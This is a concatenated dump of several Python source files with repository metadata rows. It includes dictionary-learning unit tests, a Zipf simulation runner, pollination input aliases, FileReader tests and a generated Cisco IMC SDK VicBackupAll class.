opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(D0,
S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_15(self):
N = 16
Nc = 3
Nd = 5
M = 4
K = 2
D0 = np.random.randn(Nd, Nd, Nc, M)
S = np.random.randn(N, N, Nc, K)
lmbda = 1e-1
W = np.ones(S.shape + (1,))
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(D0,
S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_16(self):
lmbda = 1e-1
W = np.ones(self.S.shape[0:2] + (1, 1, 1))
Nit = 10
opts = cbpdndl.ConvBPDNMaskDcplDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNMaskDcplDictLearn(self.D0, self.S, lmbda, W,
opt=opts, method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.0},
'CCMOD': {'RelaxParam': 1.0}})
bp = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
def test_17(self):
lmbda = 1e-1
W = np.ones(self.S.shape[0:2] + (1, self.S.shape[2], 1))
Nit = 10
opts = cbpdndl.ConvBPDNMaskDcplDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNMaskDcplDictLearn(self.D0, self.S, lmbda, W,
opt=opts, method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.0},
'CCMOD': {'RelaxParam': 1.0}})
bp = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
def test_18(self):
lmbda = 1e-1
W = np.ones(self.S.shape[0:2] + (1, self.S.shape[2], 1))
Nit = 10
opts = cbpdndl.ConvBPDNMaskDcplDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.8, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.8, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNMaskDcplDictLearn(self.D0, self.S, lmbda, W,
opt=opts, method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.8},
'CCMOD': {'RelaxParam': 1.8}})
bp = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
| 34.620588 | 79 | 0.506924 | 1,327 | 11,771 | 4.452148 | 0.076112 | 0.024543 | 0.033852 | 0.037238 | 0.957685 | 0.957685 | 0.950406 | 0.948375 | 0.948375 | 0.944651 | 0 | 0.043701 | 0.3546 | 11,771 | 339 | 80 | 34.722714 | 0.733974 | 0 | 0 | 0.86532 | 0 | 0 | 0.07493 | 0 | 0 | 0 | 0 | 0 | 0.080808 | 1 | 0.063973 | false | 0 | 0.020202 | 0 | 0.087542 | 0.040404 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
229bf9ec1bd4fd820654c28e13c42e33be9bb0c1 | 2,771 | py | Python | src/ideal_dist_runner.py | chris-wood/ccn-eavesdropper-simulator | e291a1b06ab7f35c40e99f3b42cc7398908b2acb | [
"MIT"
] | null | null | null | src/ideal_dist_runner.py | chris-wood/ccn-eavesdropper-simulator | e291a1b06ab7f35c40e99f3b42cc7398908b2acb | [
"MIT"
] | null | null | null | src/ideal_dist_runner.py | chris-wood/ccn-eavesdropper-simulator | e291a1b06ab7f35c40e99f3b42cc7398908b2acb | [
"MIT"
] | 1 | 2019-11-10T19:09:21.000Z | 2019-11-10T19:09:21.000Z | from runner import *
from network import *
Ts = range(10, 10000, 1000)
S = 16
N = 1000
processes = []
for T in Ts:
alpha = 1.5
fout = "ideal_dist_%d_%f.txt" % (T, alpha)
processes.append(create_simulation(T, N, S, 1, create_path, lambda items : ZipfDistribution(1.5, items), lambda items : ZipfDistribution(1.5, items), 1.0, 0.0, fout))
alpha = 1.6
fout = "ideal_dist_%d_%f.txt" % (T, alpha)
processes.append(create_simulation(T, N, S, 1, create_path, lambda items : ZipfDistribution(1.5, items), lambda items : ZipfDistribution(1.6, items), 1.0, 0.0, fout))
alpha = 1.7
fout = "ideal_dist_%d_%f.txt" % (T, alpha)
processes.append(create_simulation(T, N, S, 1, create_path, lambda items : ZipfDistribution(1.5, items), lambda items : ZipfDistribution(1.7, items), 1.0, 0.0, fout))
alpha = 1.8
fout = "ideal_dist_%d_%f.txt" % (T, alpha)
processes.append(create_simulation(T, N, S, 1, create_path, lambda items : ZipfDistribution(1.5, items), lambda items : ZipfDistribution(1.8, items), 1.0, 0.0, fout))
alpha = 1.9
fout = "ideal_dist_%d_%f.txt" % (T, alpha)
processes.append(create_simulation(T, N, S, 1, create_path, lambda items : ZipfDistribution(1.5, items), lambda items : ZipfDistribution(1.9, items), 1.0, 0.0, fout))
alpha = 2.0
fout = "ideal_dist_%d_%f.txt" % (T, alpha)
processes.append(create_simulation(T, N, S, 1, create_path, lambda items : ZipfDistribution(1.5, items), lambda items : ZipfDistribution(2.0, items), 1.0, 0.0, fout))
alpha = 2.1
fout = "ideal_dist_%d_%f.txt" % (T, alpha)
processes.append(create_simulation(T, N, S, 1, create_path, lambda items : ZipfDistribution(1.5, items), lambda items : ZipfDistribution(2.1, items), 1.0, 0.0, fout))
alpha = 2.2
fout = "ideal_dist_%d_%f.txt" % (T, alpha)
processes.append(create_simulation(T, N, S, 1, create_path, lambda items : ZipfDistribution(1.5, items), lambda items : ZipfDistribution(2.2, items), 1.0, 0.0, fout))
alpha = 2.3
fout = "ideal_dist_%d_%f.txt" % (T, alpha)
processes.append(create_simulation(T, N, S, 1, create_path, lambda items : ZipfDistribution(1.5, items), lambda items : ZipfDistribution(2.3, items), 1.0, 0.0, fout))
alpha = 2.4
fout = "ideal_dist_%d_%f.txt" % (T, alpha)
processes.append(create_simulation(T, N, S, 1, create_path, lambda items : ZipfDistribution(1.5, items), lambda items : ZipfDistribution(2.4, items), 1.0, 0.0, fout))
alpha = 2.5
fout = "ideal_dist_%d_%f.txt" % (T, alpha)
processes.append(create_simulation(T, N, S, 1, create_path, lambda items : ZipfDistribution(1.5, items), lambda items : ZipfDistribution(2.5, items), 1.0, 0.0, fout))
for p in processes:
p.start()
for p in processes:
p.join()
| 46.183333 | 170 | 0.665464 | 450 | 2,771 | 3.975556 | 0.095556 | 0.135271 | 0.332029 | 0.250419 | 0.939072 | 0.921185 | 0.921185 | 0.9128 | 0.806596 | 0.806596 | 0 | 0.060447 | 0.17611 | 2,771 | 59 | 171 | 46.966102 | 0.723171 | 0 | 0 | 0.295455 | 0 | 0 | 0.079394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.045455 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
229c41f747096dd4e184d04a233ecda03e63f089 | 6,462 | py | Python | pollination/alias/inputs/model.py | mostaphaRoudsari/pollination-alias | 511fcb466a9b16eacf079c3f859c0d4805ecd68d | [
"Apache-2.0"
] | 1 | 2021-05-19T12:51:14.000Z | 2021-05-19T12:51:14.000Z | pollination/alias/inputs/model.py | mostaphaRoudsari/pollination-alias | 511fcb466a9b16eacf079c3f859c0d4805ecd68d | [
"Apache-2.0"
] | 45 | 2021-02-05T21:08:08.000Z | 2022-03-09T00:17:32.000Z | pollination/alias/inputs/model.py | mostaphaRoudsari/pollination-alias | 511fcb466a9b16eacf079c3f859c0d4805ecd68d | [
"Apache-2.0"
] | 4 | 2021-02-05T18:39:46.000Z | 2021-05-18T19:37:54.000Z | from pollination_dsl.alias import InputAlias
from queenbee.io.common import IOAliasHandler
"""Alias inputs that expect a HBJSON model file as the recipe input."""
hbjson_model_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Honeybee Model to simulate or the path to a HBJSON file '
'of a Model. This can also be the path to a HBpkl file, though this is only '
'recommended for cases where the model is extremely large.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_to_json'
),
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='HBModelToJSON'
)
]
),
# Rhino alias
InputAlias.linked(
name='model',
description='This input links the model to Rhino model.',
platform=['rhino'],
handler=[
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='RhinoHBModelToJSON'
)
]
)
]
"""Alias inputs that expect a HBJSON model with sensor grids."""
hbjson_model_grid_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Honeybee Model to simulate or the path to a HBJSON file '
'of a Model. This can also be the path to a HBpkl file, though this is only '
'recommended for cases where the model is extremely large. Note that this '
'model should have sensor grids assigned to it.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_to_json_grid_check'
),
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='HBModelToJSON'
)
]
),
# Rhino alias
InputAlias.linked(
name='model',
description='This input links the model to Rhino model.',
platform=['rhino'],
handler=[
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='RhinoHBModelToJSON'
)
]
)
]
"""Alias inputs that expect a HBJSON model with sensor grids and rooms."""
hbjson_model_grid_room_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Honeybee Model to simulate or the path to a HBJSON file '
'of a Model. Note that this model must contain rooms and have sensor '
'grids assigned to it.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_to_json_grid_room_check'
),
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='HBModelToJSON'
)
]
),
# Rhino alias
InputAlias.linked(
name='model',
description='This input links the model to Rhino model.',
platform=['rhino'],
handler=[
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='RhinoHBModelToJSON'
)
]
)
]
"""Alias inputs that expect a HBJSON model with views."""
hbjson_model_view_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Honeybee Model to simulate or the path to a HBJSON file '
'of a Model. This can also be the path to a HBpkl file, though this is only '
'recommended for cases where the model is extremely large. Note that this '
'model should have views assigned to it.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_to_json_view_check'
),
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='HBModelToJSON'
)
]
),
# Rhino alias
InputAlias.linked(
name='model',
description='This input links the model to Rhino model.',
platform=['rhino'],
handler=[
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='RhinoHBModelToJSON'
)
]
)
]
"""Alias inputs that expect a HBJSON model with views."""
hbjson_model_view_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Honeybee Model to simulate or the path to a HBJSON file '
'of a Model. This can also be the path to a HBpkl file, though this is only '
'recommended for cases where the model is extremely large. Note that this '
'model should have views assigned to it.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_to_json_view_check'
),
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='HBModelToJSON'
)
]
),
# Rhino alias
InputAlias.linked(
name='model',
description='This input links the model to Rhino model.',
platform=['rhino'],
handler=[
IOAliasHandler(
language='csharp', module='Pollination.RhinoHandlers',
function='RhinoHBModelToJSON'
)
]
)
]
"""Alias inputs that expect a DFJSON model file as the recipe input."""
dfjson_model_input = [
# grasshopper Alias
InputAlias.any(
name='model',
description='A Dragonfly Model object or the path to a DFJSON file.',
platform=['grasshopper'],
handler=[
IOAliasHandler(
language='python', module='pollination_handlers.inputs.model',
function='model_dragonfly_to_json'
)
]
)
]
| 32.80203 | 85 | 0.579542 | 634 | 6,462 | 5.834385 | 0.126183 | 0.095161 | 0.059476 | 0.027034 | 0.939443 | 0.936199 | 0.924034 | 0.915112 | 0.915112 | 0.915112 | 0 | 0 | 0.330238 | 6,462 | 196 | 86 | 32.969388 | 0.854667 | 0.025843 | 0 | 0.708333 | 0 | 0 | 0.394804 | 0.09713 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.011905 | 0 | 0.011905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
22d8d23b868c37ca36f49ee778e4a2df0d62b94b | 4,623 | py | Python | test_file_reader.py | baillielab/maic | c0a91045554b1a81a4f715fbc4ef4dd8cadbba2c | [
"MIT"
] | 4 | 2020-01-15T16:17:40.000Z | 2022-02-14T10:38:56.000Z | test_file_reader.py | baillielab/maic | c0a91045554b1a81a4f715fbc4ef4dd8cadbba2c | [
"MIT"
] | 1 | 2020-02-07T15:20:41.000Z | 2020-02-13T11:38:31.000Z | test_file_reader.py | baillielab/maic | c0a91045554b1a81a4f715fbc4ef4dd8cadbba2c | [
"MIT"
] | null | null | null | from unittest import TestCase, main
import mock
from file_reader import FileReader
class TestFileReader(TestCase):
def test_file_reader_has_zero_lines_by_default(self):
"""Check that the FileReader has no data in the list_lines attribute"""
test_object = FileReader()
self.assertFalse(test_object.list_lines,
"list_lines should be empty by default")
@mock.patch('file_reader.io.open', create=True)
def test_file_is_open_and_read(self, mocked_open):
"""
Check that a file is read and the data added to the list_lines
attribute
"""
mocked_open.side_effect = [
mock.mock_open(read_data="Category\tName\tRANKED\tG1\tG2\r"
"CRLF\r\n"
"LF\n"
"No end of file")
.return_value
]
__file_path = "Path to File"
test_object = FileReader()
test_object.read_file(__file_path)
mocked_open.assert_called_with(__file_path, "r")
self.assertEqual(4, len(test_object.list_lines),
"Should be 4 items in the list")
@mock.patch('file_reader.io.open', create=True)
def test_five_hyphens_at_start_ends_read(self, mocked_open):
"""
Check that a file is read and the data added to the list_lines
attribute, stopping reading when we see a line that starts with '-----'
"""
mocked_open.side_effect = [
mock.mock_open(
read_data="CR\rCRLF\r\n-----LF\nNo end of file"
).return_value
]
__file_path = "Path to File"
test_object = FileReader()
test_object.read_file(__file_path)
mocked_open.assert_called_with(__file_path, "r")
self.assertEqual(2, len(test_object.list_lines),
"Should be 2 items in the list")
@mock.patch('file_reader.io.open', create=True)
def test_hash_at_start_skips_line(self, mocked_open):
"""
Check that a file is read and the data added to the list_lines
attribute, ignoring lines that start with '#'
"""
mocked_open.side_effect = [
mock.mock_open(
read_data="#CR\rCRLF\r\n# LF\nNo end of file"
).return_value
]
__file_path = "Path to File"
test_object = FileReader()
test_object.read_file(__file_path)
mocked_open.assert_called_with(__file_path, "r")
self.assertEqual(2, len(test_object.list_lines),
"Should be 2 items in the list")
@mock.patch('file_reader.io.open', create=True)
def test_blank_lines_are_safely_ignored(self, mocked_open):
"""
Check that a file is read and the data added to the list_lines
attribute, ignoring any blank lines
"""
mocked_open.side_effect = [
mock.mock_open(read_data="Category\tName\tRANKED\tG1\tG2\r"
"CRLF\r\n"
"\n"
"LF\n"
"\n"
"No end of file")
.return_value
]
__file_path = "Path to File"
test_object = FileReader()
test_object.read_file(__file_path)
mocked_open.assert_called_with(__file_path, "r")
self.assertEqual(4, len(test_object.list_lines),
"Should be 4 items in the list")
@mock.patch('file_reader.io.open', create=True)
def test_whitespace_lines_are_safely_ignored(self, mocked_open):
"""
Check that a file is read and the data added to the list_lines
attribute, ignoring any lines that are solely whitespace
"""
mocked_open.side_effect = [
mock.mock_open(read_data="Category\tName\tRANKED\tG1\tG2\r"
"CRLF\r\n"
"\t\t\n"
" \n"
"LF\n"
"\n"
"No end of file")
.return_value
]
__file_path = "Path to File"
test_object = FileReader()
test_object.read_file(__file_path)
mocked_open.assert_called_with(__file_path, "r")
self.assertEqual(4, len(test_object.list_lines),
"Should be 4 items in the list")
if __name__ == '__main__':
main()
| 38.848739 | 79 | 0.547696 | 559 | 4,623 | 4.221825 | 0.171735 | 0.072034 | 0.022881 | 0.05339 | 0.806356 | 0.806356 | 0.806356 | 0.806356 | 0.806356 | 0.806356 | 0 | 0.005461 | 0.366212 | 4,623 | 118 | 80 | 39.177966 | 0.8 | 0.130002 | 0 | 0.744186 | 0 | 0 | 0.157472 | 0.030821 | 0 | 0 | 0 | 0 | 0.127907 | 1 | 0.069767 | false | 0 | 0.034884 | 0 | 0.116279 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a3b76014633a352d093cd93ebeca5a3220b63fb2 | 7,442 | py | Python | imcsdk/mometa/vic/VicBackupAll.py | ecoen66/imcsdk | b10eaa926a5ee57cea7182ae0adc8dd1c818b0ab | [
"Apache-2.0"
] | 31 | 2016-06-14T07:23:59.000Z | 2021-09-12T17:17:26.000Z | imcsdk/mometa/vic/VicBackupAll.py | sthagen/imcsdk | 1831eaecb5960ca03a8624b1579521749762b932 | [
"Apache-2.0"
] | 109 | 2016-05-25T03:56:56.000Z | 2021-10-18T02:58:12.000Z | imcsdk/mometa/vic/VicBackupAll.py | sthagen/imcsdk | 1831eaecb5960ca03a8624b1579521749762b932 | [
"Apache-2.0"
] | 67 | 2016-05-17T05:53:56.000Z | 2022-03-24T15:52:53.000Z | """This module contains the general information for VicBackupAll ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class VicBackupAllConsts:
ADMIN_STATE_TRIGGER = "trigger"
ADMIN_STATE_TRIGGERED = "triggered"
PROTO_FTP = "ftp"
PROTO_HTTP = "http"
PROTO_NONE = "none"
PROTO_SCP = "scp"
PROTO_SFTP = "sftp"
PROTO_TFTP = "tftp"
class VicBackupAll(ManagedObject):
"""This is VicBackupAll class."""
consts = VicBackupAllConsts()
naming_props = set([])
mo_meta = {
"classic": MoMeta("VicBackupAll", "vicBackupAll", "vic-all-exportconfig", VersionMeta.Version303a, "InputOutput", 0x3ff, [], ["admin", "read-only", "user"], ['topSystem'], [], ["Get", "Set"]),
"modular": MoMeta("VicBackupAll", "vicBackupAll", "vic-all-exportconfig", VersionMeta.Version303a, "InputOutput", 0x3ff, [], ["admin", "read-only", "user"], ['equipmentChassis'], [], ["Get", "Set"])
}
prop_meta = {
"classic": {
"admin_state": MoPropertyMeta("admin_state", "adminState", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["trigger", "triggered"], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"hostname": MoPropertyMeta("hostname", "hostname", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, r"""(([0-9A-Fa-f]{1,4}:([0-9A-Fa-f]{1,4}:([0-9A-Fa-f]{1,4}:([0-9A-Fa-f]{1,4}:([0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{0,4}|:[0-9A-Fa-f]{1,4})?|(:[0-9A-Fa-f]{1,4}){0,2})|(:[0-9A-Fa-f]{1,4}){0,3})|(:[0-9A-Fa-f]{1,4}){0,4})|:(:[0-9A-Fa-f]{1,4}){0,5})((:[0-9A-Fa-f]{1,4}){2}|:(25[0-5]|(2[0-4]|1[0-9]|[1-9])?[0-9])(\.(25[0-5]|(2[0-4]|1[0-9]|[1-9])?[0-9])){3})|(([0-9A-Fa-f]{1,4}:){1,6}|:):[0-9A-Fa-f]{0,4}|([0-9A-Fa-f]{1,4}:){7}:) |((([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,6})|(([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)+)|([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))""", [], []),
"proto": MoPropertyMeta("proto", "proto", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["ftp", "http", "none", "scp", "sftp", "tftp"], []),
"pwd": MoPropertyMeta("pwd", "pwd", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x20, 0, 255, None, [], []),
"remote_file": MoPropertyMeta("remote_file", "remoteFile", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x40, 0, 255, r"""[^\(\)~`'\?\\"";<>\|&\*\^$%]{1,255}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x80, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x100, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"user": MoPropertyMeta("user", "user", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x200, 0, 255, None, [], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version303a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version303a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"progress": MoPropertyMeta("progress", "progress", "string", VersionMeta.Version303a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
},
"modular": {
"admin_state": MoPropertyMeta("admin_state", "adminState", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["trigger", "triggered"], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"hostname": MoPropertyMeta("hostname", "hostname", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, r"""(([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,6})|(([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)+)|(https?://)?([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])""", [], []),
"proto": MoPropertyMeta("proto", "proto", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["ftp", "http", "none", "scp", "sftp", "tftp"], []),
"pwd": MoPropertyMeta("pwd", "pwd", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x20, 0, 255, None, [], []),
"remote_file": MoPropertyMeta("remote_file", "remoteFile", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x40, 0, 255, r"""[^\(\)~`'\?\\"";<>\|&\*\^$%]{1,255}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x80, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x100, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"user": MoPropertyMeta("user", "user", "string", VersionMeta.Version303a, MoPropertyMeta.READ_WRITE, 0x200, 0, 255, None, [], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version303a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version303a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"progress": MoPropertyMeta("progress", "progress", "string", VersionMeta.Version303a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
},
}
prop_map = {
"classic": {
"adminState": "admin_state",
"dn": "dn",
"hostname": "hostname",
"proto": "proto",
"pwd": "pwd",
"remoteFile": "remote_file",
"rn": "rn",
"status": "status",
"user": "user",
"childAction": "child_action",
"descr": "descr",
"progress": "progress",
},
"modular": {
"adminState": "admin_state",
"dn": "dn",
"hostname": "hostname",
"proto": "proto",
"pwd": "pwd",
"remoteFile": "remote_file",
"rn": "rn",
"status": "status",
"user": "user",
"childAction": "child_action",
"descr": "descr",
"progress": "progress",
},
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.admin_state = None
self.hostname = None
self.proto = None
self.pwd = None
self.remote_file = None
self.status = None
self.user = None
self.child_action = None
self.descr = None
self.progress = None
ManagedObject.__init__(self, "VicBackupAll", parent_mo_or_dn, **kwargs)
| 65.280702 | 890 | 0.565305 | 938 | 7,442 | 4.407249 | 0.119403 | 0.019352 | 0.162554 | 0.243832 | 0.825109 | 0.816401 | 0.814465 | 0.807934 | 0.807934 | 0.805273 | 0 | 0.081148 | 0.1853 | 7,442 | 113 | 891 | 65.858407 | 0.600693 | 0.013975 | 0 | 0.543478 | 0 | 0.021739 | 0.334289 | 0.155201 | 0 | 0 | 0.01092 | 0 | 0 | 1 | 0.01087 | false | 0 | 0.032609 | 0 | 0.206522 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a3f87df2b7692a360dd7fc929f31afabbf315a16 | 48 | py | Python | skforecast/ForecasterAutoreg/__init__.py | JoaquinAmatRodrigo/skforecaster | 3ab526d63bbb94ae4bd18ae964197042a675a34a | [
"MIT"
] | 86 | 2021-02-25T08:56:45.000Z | 2022-03-31T01:33:53.000Z | skforecast/ForecasterAutoreg/__init__.py | hdiazsqlr/skforecast | 5ee79a51960a27db9e169706014528eae403e1c2 | [
"MIT"
] | 5 | 2021-11-30T22:30:45.000Z | 2022-03-29T10:21:36.000Z | skforecast/ForecasterAutoreg/__init__.py | hdiazsqlr/skforecast | 5ee79a51960a27db9e169706014528eae403e1c2 | [
"MIT"
] | 24 | 2021-04-04T09:58:26.000Z | 2022-03-09T15:55:44.000Z | from .ForecasterAutoreg import ForecasterAutoreg | 48 | 48 | 0.916667 | 4 | 48 | 11 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 48 | 1 | 48 | 48 | 0.977778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
432188f233f91e7ce20cc93d465f74389ddd0f31 | 2,659 | py | Python | tests/gate/test_ORGate4.py | jamesjiang52/Bitwise | c71f151d23034b3f9e2a939f637be0eaa16c45c3 | [
"MIT"
